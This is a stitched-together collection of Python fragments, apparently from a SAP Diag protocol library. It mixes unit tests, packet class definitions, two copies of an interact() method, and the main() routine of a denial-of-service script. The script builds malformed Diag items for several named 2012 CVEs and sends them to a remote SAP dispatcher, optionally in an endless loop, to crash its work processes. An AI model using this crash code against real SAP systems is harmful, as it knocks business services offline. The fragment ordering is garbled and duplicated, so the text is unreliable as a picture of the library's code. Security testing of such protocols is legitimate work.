def test_sapdiag_items_lookup(self):
"""Test lookup and filtering of SAPDiagItems inside a SAPDiag
packet"""
sapdiag = SAPDiag()
sapdiag_ses_item = SAPDiagItem(item_type="SES")
sapdiag.message.append(sapdiag_ses_item)
sapdiag_appl_item = SAPDiagItem(item_type="APPL",
item_id="ST_USER",
item_sid="RFC_PARENT_UUID")
sapdiag.message.append(sapdiag_appl_item)
self.assertIn(sapdiag_ses_item, sapdiag.get_item(0x1))
self.assertIn(sapdiag_ses_item, sapdiag.get_item("SES"))
self.assertNotIn(sapdiag_ses_item, sapdiag.get_item(0x10))
self.assertNotIn(sapdiag_ses_item, sapdiag.get_item("APPL"))
self.assertIn(sapdiag_appl_item, sapdiag.get_item(0x10))
self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL"))
self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x04))
self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER"))
self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x04, 0x10))
self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", 0x10))
self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", "RFC_PARENT_UUID"))
self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(0x1))
self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL4"))
self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x06))
self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_R3INFO"))
self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x04, 0x02))
self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", 0x02))
self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", "CONNECT"))
self.assertListEqual([sapdiag_ses_item, sapdiag_appl_item], sapdiag.get_item([0x01, 0x10]))
self.assertListEqual([sapdiag_ses_item, sapdiag_appl_item], sapdiag.get_item(["SES", "APPL"]))
self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], [0x04, 0x06]))
self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], ["ST_USER", "ST_R3INFO"]))
self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], 0x04, [0x02, 0x10]))
self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], "ST_USER", ["RFC_PARENT_UUID", "CONNECT"]))
self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(["SES", "APPL4"]))
self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], ["ST_R3INFO"]))
self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], ["ST_USER"], ["CONNECT"]))
# Insert a wrong item and observe that the lookup still works
sapdiag.message.append(Raw("\x00" * 10))
self.assertIn(sapdiag_ses_item, sapdiag.get_item("SES"))
self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], "ST_USER", ["RFC_PARENT_UUID", "CONNECT"]))
def test_sapdiag_header_dissection_compressed(self):
"""Test SAPDiag headers dissection with compression"""
diag_item = SAPDiagItem(item_value="TEST_COMPRESSED")
diag_header_compr = SAPDiag(compress=1)
diag_header_compr.message.append(diag_item)
new_diag_header_compr = SAPDiag(str(diag_header_compr))
self.assertEqual(str(diag_header_compr.message[0]),
str(new_diag_header_compr.message[0]))
def test_sapdiag_header_dissection_plain(self):
"""Test SAPDiag headers dissection without compression"""
diag_item = SAPDiagItem(item_value="TEST_PLAIN")
diag_header_plain = SAPDiag(compress=0)
diag_header_plain.message.append(diag_item)
new_diag_header_plain = SAPDiag(str(diag_header_plain))
self.assertEqual(str(diag_header_plain), str(new_diag_header_plain))
def interact(self, message):
"""Interacts with the SAP Diag server, adding the :class:`SAPDiagStep` item and
ending with a 'end of message' item.
:param message: items to send
:type message: ``list`` of :class:`SAPDiagItem`
:return: server's response
:rtype: :class:`SAPNI<SAPNI.SAPNI>`
"""
if self.initialized:
self.step += 1
message.insert(0, SAPDiagItem(item_type="APPL", item_id="ST_USER",
item_sid=0x26,
item_value=SAPDiagStep(step=self.step)))
message.append(SAPDiagItem(item_type="EOM"))
return self.sr_message(message)
else:
return None
def interact(self, message):
"""Interacts with the SAP Diag server, adding the L{SAPDiagStep} item and
ending with a 'end of message' item.
@param message: items to send
@type message: C{list} of L{SAPDiagItem}
@return: server's response
@rtype: L{SAPNI<SAPNI.SAPNI>}
"""
if self.initialized:
self.step = self.step + 1
message.insert(0, SAPDiagItem(item_type="APPL", item_id="ST_USER",
item_sid=0x26,
item_value=SAPDiagStep(step=self.step)))
message.append(SAPDiagItem(item_type="EOM"))
return self.sr_message(message)
else:
return None
def get_support_data_item(self, support_data):
if isinstance(support_data, str):
support_data = SAPDiagSupportBits(unhex(support_data))
if isinstance(support_data, SAPDiagSupportBits):
support_data = SAPDiagItem(item_type="APPL",
item_id="ST_USER",
item_sid="SUPPORTDATA",
item_value=support_data)
if isinstance(support_data, SAPDiagItem):
return support_data
return None
def main():
options = parse_options()
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
print("[*] Testing Dispatcher DoS vulnerabilities on host %s:%d" % (options.remote_host,
options.remote_port))
# Crafting the item according to the CVE selected
if options.cve == 1:
print("[*] Crash in DiagTraceHex (CVE-2012-2612) using a DataStream (Diag XML Blob) "
"(requires Dialog Developer Trace enabled at level 2 or 3)")
item = SAPDiagItem(item_type="DIAG_XMLBLOB", item_length=0xFFFFFFFF, item_value="Crash!")
elif options.cve == 2:
print("[*] Crash in DiagTraceHex (CVE-2012-2612) using a variable ST_USER ST_USER_PASSPORT_DATA item "
"(requires Dialog Developer Trace enabled at level 2 or 3)")
item = SAPDiagItem(item_type="APPL4", item_id="ST_USER", item_sid=0x18, item_length=0xFFFFFFFF,
item_value="Crash!")
elif options.cve == 3:
print("[*] Crash in DiagTraceAtoms (CVE-2012-2511) using a DYNT ATOM item "
"(requires Dialog Developer Trace enabled at level 2 or 3)")
item = SAPDiagItem(item_type="APPL4", item_id="DYNT", item_sid=0x02, item_value="\x80" * 8)
elif options.cve == 4:
print("[*] Crash in DiagTraceStreamI (CVE-2012-2512) using a RCUI RCUI_CONNECT_DATA item "
"(requires Dialog Developer Trace enabled at level 2 or 3)")
item = SAPDiagItem(item_type="APPL", item_id="RCUI", item_sid=0x09, item_length=0xFF,
item_value="\x12\x1A\x59\x51")
elif options.cve == 5:
print("[*] Crash in diaginput (CVE-2012-2513) using a VARINFO MAINAREA_PIXELSIZE item")
item = SAPDiagItem(item_type="APPL", item_id="VARINFO", item_sid=0x0e, item_value="A" * 10)
elif options.cve == 6:
print("[*] Crash in DiagiEventSource (CVE-2012-2514) using a UI_EVENT UI_EVENT_SOURCE item")
item = SAPDiagItem(item_type="APPL", item_id="UI_EVENT", item_sid=0x01, item_value="A" * 16)
else:
print("[-] Invalid CVE specified!")
return
if options.loop:
try:
while True:
if options.verbose:
print("[*] Started a new round")
send_crash(options.remote_host, options.remote_port, item,
options.number, options.verbose, options.terminal,
options.route_string)
sleep(options.delay)
except KeyboardInterrupt:
print("[*] Cancelled by the user")
else:
print("[*] Selected a single round")
send_crash(options.remote_host, options.remote_port, item,
options.number, options.verbose, options.terminal,
options.route_string)
print("[*] Crash sent, take a look at the work processes !")
def test_sapdiag_items_bind(self):
"""Test binding of SAPDiagItem classes"""
class SAPDiagItemTest(Packet):
fields_desc = [StrField("strfield", None)]
bind_diagitem(SAPDiagItemTest, "APPL", 0x99, 0xff)
item_string = "strfield"
item_value = SAPDiagItemTest(strfield=item_string)
item = SAPDiagItem("\x10\x99\xff" + pack("!H", len(item_string)) + item_string)
self.assertEqual(item.item_value, item_value)
self.assertEqual(item.item_length, len(item_string))
self.assertEqual(item.item_value.strfield, item_string)
self.assertEqual(str(item.item_value), str(item_value))
self.assertIs(diag_item_get_class(item, "APPL", 0x99, 0xff), SAPDiagItemTest)
def test_sapdiag_header_build(self):
"""Test SAPDiag headers building"""
diag_item = SAPDiagItem(item_value="TEST")
diag_header_plain = SAPDiag(compress=0)
diag_header_plain.message.append(diag_item)
diag_plain_message = str(diag_header_plain.message)
diag_header_compr = SAPDiag(compress=1)
diag_header_compr.message.append(diag_item)
diag_compr_message = str(diag_header_compr.message)
self.assertEqual(diag_plain_message, diag_compr_message)
diag_header_compr.compress = 0
self.assertEqual(str(diag_header_plain), str(diag_header_compr))
# 3000 0x00000bb8 SAP GUI Windows
#
class SAPDiagUserConnect(Packet):
name = "SAP Diag User Connect"
fields_desc = [
IntField("protocol_version", 100200),
IntField("code_page", 1100),
IntField("ws_type", 5001)
]
bind_diagitem(SAPDiagUserConnect, "APPL", 0x04, 0x02)
user_connect_compressed = \
SAPDiagItem(item_type="APPL",
item_id="ST_USER",
item_sid=0x02,
item_value=SAPDiagUserConnect())
user_connect_uncompressed = \
SAPDiagItem(item_type="APPL",
item_id="ST_USER",
item_sid=0x02,
item_value=SAPDiagUserConnect(protocol_version=200))
# Diag Dialog step item
class SAPDiagStep(Packet):
name = "SAP Diag Dialog Step"
fields_desc = [IntField("step", 0)]
def test_sapdiag_item(self):
"""Test construction of SAPDiag Items"""
with self.assertRaises(KeyError):
SAPDiagItem(item_type="LALA")
